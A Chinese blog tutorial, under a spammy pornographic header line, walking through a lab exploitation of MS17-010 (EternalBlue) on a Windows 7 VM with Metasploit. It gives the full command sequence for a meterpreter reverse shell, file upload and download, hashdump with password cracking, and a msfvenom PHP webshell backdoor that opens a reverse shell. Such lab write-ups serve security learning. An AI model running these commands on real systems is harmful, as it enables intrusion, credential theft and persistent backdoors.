国产xxxx99真实实拍_久久不雅视频_高清韩国a级特黄毛片_嗯老师别我我受不了了小说

資訊專欄INFORMATION COLUMN

MS17-010漏洞利用

big_cat / 2626人閱讀

摘要:漏洞利用漏洞利用安裝虛擬機(jī),實(shí)現(xiàn)利用實(shí)現(xiàn)對(duì)其主機(jī)開始滲透,查看該主機(jī)信息,打開遠(yuǎn)程桌面,抓取用戶名和密碼并破譯,創(chuàng)建一個(gè)文件,實(shí)現(xiàn)上傳,下載,刪除。

MS17-010漏洞利用

1.安裝虛擬機(jī)win7 x64,實(shí)現(xiàn)利用ms17-010實(shí)現(xiàn)對(duì)其win7 x64主機(jī)開始滲透,查看該主機(jī)信息,打開遠(yuǎn)程桌面,抓取用戶名和密碼并破譯,創(chuàng)建一個(gè) : 70zsz.txt文件,實(shí)現(xiàn)上傳,下載,刪除。

首先啟動(dòng)win7 x64虛擬機(jī),查看IP地址為192.168.70.139,如下如圖所示:

在win7 x64上搭建wamp網(wǎng)站服務(wù)器從上到下依次安裝軟件,如下如所示:

安裝成功后通過瀏覽器訪問192.168.70.139查看是否能正常訪問該網(wǎng)站,如下圖所示:

Ms17-010漏洞的利用

接下來打開kali實(shí)現(xiàn)利用ms17-010漏洞,實(shí)現(xiàn)對(duì)其win7 x64主機(jī)進(jìn)行滲透,首先使用scanner下掃描模塊掃描目標(biāo)主機(jī)是否存在ms17-010的漏洞,如下圖所示:
在kali中輸入以下命令:

命令:msfconsole

命令:search ms17-010

>use auxiliary/scanner/smb/smb_ms17-010>set RHOSTS 192.168.70.139>run

確認(rèn)目標(biāo)機(jī)器的操作系統(tǒng)及存在漏洞之后便可以進(jìn)行漏洞攻擊了,輸入命令use exploit/windows/smb/ms17_010_eternalblue,調(diào)用exploit下的ms17_010_eternalblue模塊,并輸入命令show payloads 查看可用的payload,如下圖所示:

輸入命令set payload windows/x64/meterpreter/reverse_tcp設(shè)置payload,并輸入命令show options查看參數(shù)配置,如下圖所示,需要配置的參數(shù)為RHOST和LHOST

輸入命令set RHOST 192.168.70.139 配置目標(biāo)機(jī)器的IP地址,輸入命令set LHOST 192.168.70.134 配置kali本地的IP地址,配置完成后輸入命令show options檢查參數(shù),如下圖所示:

參數(shù)配置檢查無誤后,輸入命令run開始攻擊,并且返回一個(gè)meterptrter會(huì)話說明已經(jīng)攻擊成功了,如下圖所示:

后滲透攻擊:信息收集

進(jìn)程遷移:例如攻擊者利用瀏覽器漏洞攻陷了目標(biāo)主機(jī),但攻擊滲透后的瀏覽器有可能被用戶關(guān)閉,此shell是非常脆弱的,所以獲取shell后的第一步就是移動(dòng)這個(gè)shell,將它和目標(biāo)主機(jī)中一個(gè)穩(wěn)定的進(jìn)程綁定在一起。

例如:輸入ps命令獲取目標(biāo)主機(jī)正在運(yùn)行的進(jìn)程,如下圖所示:

輸入命令getpid查看meterperter shell的進(jìn)程號(hào)為2280,如下圖所示:

我們可用使用自動(dòng)遷移進(jìn)程命令,系統(tǒng)會(huì)自動(dòng)尋找合適的進(jìn)程然后進(jìn)行遷移,輸入自動(dòng)遷移命令run post/windows/manage/migrate,執(zhí)行命令后此時(shí)將原先的2280進(jìn)程號(hào)修改為1244,如圖所示:

收集系統(tǒng)信息:獲取了穩(wěn)定進(jìn)程之后開始收集系統(tǒng)信息,輸入命令sysinfo查看目標(biāo)主機(jī)的系統(tǒng)信息,如下圖所示:

捕獲桌面輸入命令screenshot抓取目標(biāo)主機(jī)的屏幕截圖路徑為/root/bPgQxuoB,jpeg文件,如下圖所示:

輸入shell命令進(jìn)入目標(biāo)機(jī)器shell,如下圖所示:

在shell輸入exit可用停止shell會(huì)話并返回meterperter中,如下圖所示:

上傳文件命令upload,在kali虛擬機(jī)root目錄下存在70zsz.txt文件,其內(nèi)容為I‘m is 70 zsz!,輸入命令upload /root/70zsz.txt c://,此文件上傳到目標(biāo)機(jī)器c:/目錄下,如下圖所示:

輸入shell進(jìn)入Windows shell查看從c:/目錄下是否有剛剛我們上傳的70zsz.txt文件,如下圖所示:

下載文件命令download,輸入命令download c:/70zsz.txt/root/download將目標(biāo)機(jī)器c:/下的70zsz.txt下載到本機(jī)/root/download中,如下圖所示:

輸入命令rm c://70zsz.txt 將目標(biāo)機(jī)器c:/下的70zsz.txt刪除,如下圖所示:

后滲透攻擊:Hash攻擊

使用Hashdump抓取密碼,HashdumpMeterpreter腳本可用從目標(biāo)機(jī)器中提取Hash值,破解Hash值可獲得登錄密碼。計(jì)算機(jī)中的每個(gè)賬號(hào)的用戶名和密碼都存儲(chǔ)在sam中,當(dāng)計(jì)算機(jī)運(yùn)行時(shí),該文件對(duì)所有賬號(hào)進(jìn)行鎖定,想要訪問就必須有“系統(tǒng)級(jí)“的賬號(hào)。

在meterpreter shell提示符下輸入hashdump命令,將導(dǎo)出sam數(shù)據(jù)庫(kù)中Hash,如下圖所示:

從圖中我們可用看出,返回了三個(gè)用戶賬號(hào),分別為Administrator,Guest,zsz,數(shù)據(jù)輸出的格式為用戶名:SID:LM哈希:NTLM哈希:::,在zsz賬戶中NTLM哈希進(jìn)行破解,使用在線破解網(wǎng)站對(duì)其進(jìn)行破解,如https://www.cmd5.com/,可以看到結(jié)果正是為zsz賬戶的密碼:123456

后滲透攻擊:后門

Meterpreter后門:在Meterpreter中,有一個(gè)名為PGP Meterpreter的payload,利用這個(gè)模塊可創(chuàng)建具有Meterpreter功能的PHP WebShell,在攻擊中使用Metasploit PHP Shell步驟如下:
1.使用msfvenom創(chuàng)建一個(gè)webshell.php

2.上傳webshell.php到目標(biāo)服務(wù)器

3.運(yùn)行Metasploit multi-handler開始監(jiān)聽

4.訪問webshell.php頁面

5.獲得反彈Metasploit shell

首先通過Metasploit的msfvenom攻擊制作PHP Meterpreter,輸入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php,如下圖所示:

因?yàn)槟繕?biāo)主機(jī)使用了wampserver,因此得知需要上傳070zsz.php文件至目標(biāo)主機(jī)中c:/wamp64/www中,如下圖所示:

輸入exit返回meterpreter,使用上傳命令upload/root/070zsz.php c://wamp64//www中,如下圖所示:

輸入exit回到msf,輸入如下命令設(shè)置監(jiān)聽,如下圖所示:

>exit>use exploit/multi/handler>set payload php/meterpreter/reverse_tcp>set LHOST 192.168.70.134>run

打開瀏覽器,訪問目標(biāo)機(jī)器服務(wù)器中070zsz.php文件,即訪問http://192.168.70.139/070zsz.php ,結(jié)果可以看到服務(wù)端反彈shell成功如下圖所示:

文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請(qǐng)注明本文地址:http://specialneedsforspecialkids.com/yun/124528.html

相關(guān)文章

發(fā)表評(píng)論

0條評(píng)論

最新活動(dòng)
閱讀需要支付1元查看
<